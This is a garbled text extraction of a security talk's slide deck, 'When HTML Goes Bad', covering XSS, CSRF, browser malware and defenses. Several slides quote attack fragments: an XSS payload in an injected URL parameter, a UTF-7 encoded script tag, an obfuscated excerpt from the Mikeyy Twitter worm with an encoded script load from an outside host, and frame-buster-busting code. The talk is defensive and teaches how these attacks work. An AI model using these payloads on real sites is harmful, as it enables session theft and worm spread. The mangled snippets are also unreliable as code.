8/2/2019 When HTML Goes Bad
1/22
When HTML Goes BadInside XSS, CSRF, and Malware...
Mike ShemaSecurity Research Engineer, Qualys Inc.
8/2/2019 When HTML Goes Bad
2/22
When HTML Goes Bad
XSS (HTML injection)
CSRF HTTP actuation
2
Malware (game over...)
8/2/2019 When HTML Goes Bad
3/22
Money Attacks refocus from web server to
web browser via the web application
Compromise the web application in order
3
o use as a e very mec an sm Infect rather than deface
Automated SQL injection attacks infected
tens of thousands of web sites
8/2/2019 When HTML Goes Bad
4/22
Us and Them
...exploit the system
to gain adminaccess
Requires shell code
...exploit the browser
No shell code required
Access financialinformation
4
Install keylogger, networksniffer, botnet
Search for documents,credentials,
Access e-mail
Access social network
8/2/2019 When HTML Goes Bad
5/22
Poles Apart Desktop
Access controls
Processseparation
Browser
Same Origin Policy
Blocks pop-ups
-
5
Anti-virus
cookies Tabs!
Database (HTML5)
8/2/2019 When HTML Goes Bad
6/22
Safe Links?
http://bit.ly/2z3MBj http://bit.ly/z18Rv
http://bit.ly/OApJX
6
http://bit.ly/lSxst http://bit.ly/wszWO
http://bit.ly/A6Ca
http://tinyurl.com/6q2ab9
8/2/2019 When HTML Goes Bad
7/22
Infection
8/2/2019 When HTML Goes Bad
8/22
Behind the Scenes
http://website/page.cgi?user=MachineWelcome to the Machine...
8
http://website/page.cgi?user=...Welcome to the ......
8/2/2019 When HTML Goes Bad
9/22
Behind the Scenes
http://website/page.cgi?redirect=http://website/otherpage.html
Welcome to the Machinelink...
9
http://website/page.cgi?redirect=+onclick=alert(echoes);a=Welcome to the Machine
link...
8/2/2019 When HTML Goes Bad
10/22
So You Think You Can Tell...
+ADw-script+AD4-
10
orem psem .source
8/2/2019 When HTML Goes Bad
11/22
Careful With That AJAX, Eugenevar _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect","toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1","setRequestHeader", "Content-Type", "application/x-www-form-urlencoded",
"onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28",")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace","innerHTML", "documentElement", "exec", "Twitter should really fix this...Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this,regards Mikeyy", "random", "length", "floor", "mikeyy:)"
11
.
%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));
8/2/2019 When HTML Goes Bad
12/22
XSS
Character encoding Valid, but unexpected
Invalid but rendered
12
Payload encoding JavaScript obfuscation
Browser-specific quirk
8/2/2019 When HTML Goes Bad
13/22
Unusual Suspects
Flash
Images
13
Browser quirks
8/2/2019 When HTML Goes Bad
14/22
Where Are the Worms?
MySpace (old, so very, very old) Twitter
No lar e web a worm has been trul
14
weaponized
8/2/2019 When HTML Goes Bad
15/22
CSRF
Taking advantage of the design ofHTML & HTTP
Forcing state onto a non-stateful
15
transport Forced workflows
8/2/2019 When HTML Goes Bad
16/22
Frame Busting if (top != self) { top.location.replace(self.location.href); }
var prevent_bust = 0;window.onbeforeunload = function(){ prevent_bust++ }setInterval(function() {if (prevent_bust > 0) {prevent_bust -= 2;
'
16
. . - - - -
204.com'}}, 1)
http://www.codinghorror.com/blog/archives/001277.html
http://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed
8/2/2019 When HTML Goes Bad
17/22
8/2/2019 When HTML Goes Bad
18/22
Bricks in the Wall
Coding practices Frameworks
Libraries
18
. Rectify vs. reject
Inoculation
8/2/2019 When HTML Goes Bad
19/22
Another Brick in the Wall
User base xssed, ha.ckers.org
Web application scanners
19
Source code scanners
8/2/2019 When HTML Goes Bad
20/22
Browser Evolution Move more countermeasures into
the browser Process isolation
Anti-XSS
20
Anti-CSRF Behavioral anti-virus
8/2/2019 When HTML Goes Bad
21/22
A New Machine
HTML5
Cross-document messaging a.k.a. SomeOther Origins, Too
Database
21
Expanding the attack surface Increasing the information store
8/2/2019 When HTML Goes Bad
22/22
Thank You!
During Live PresentationPlease Use Your WebExQ&A Panel to Submit Questions
22
To Request a 14-day Free Trialof our Web Application Scanning Solution, email:
Top Related